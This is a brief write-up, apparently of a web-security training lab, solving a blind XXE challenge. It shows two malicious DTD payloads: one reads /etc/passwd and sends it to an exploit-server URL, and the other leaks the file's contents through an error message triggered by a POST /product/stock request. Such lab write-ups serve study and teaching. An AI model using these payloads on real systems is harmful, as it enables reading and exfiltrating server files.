Since this lab about blind XXE i won't be trying the default XXE techniques and i will be taking another road. Like the previous lab i was giving an exploit server to use and that's going to be so handy. I will be taking the same steps as the previous lab by hosting a malicious DTD file on that exploit server that will be reading and fetching the content of the /etc/passwd file.
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % stacked "<!ENTITY % exfil SYSTEM 'https://exploit-**********.com/?x=%file;'>">
%stacked;
%exfile;
and then I will be calling that DTD with an external entity that i will inject in the POST /product/stock request
this didn't work so what i will be doing is try to trigger an error and hoping that error will be revealing the data i want to exfiltrate. and to do that i will modify my malicious file to be
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///thispathdoesnexist/%file;'>">
%eval;
%error;
as you can now when i will try to load my malicious DTD file it will read the content of the /etc/passwd and save it to the file entity then it will try and and send through an HTTP request the content of a at this localtion /thispathdoesnexist with knowing that the file name it is looking for is the /etc/passwd content since this will error it, logically it will say that file doesn't exist calling its name which in my case is the content of /etc/passwd and that\s how i leaked the data trough error messages.
now by resending the POST /product/stock to load the malicious DTD again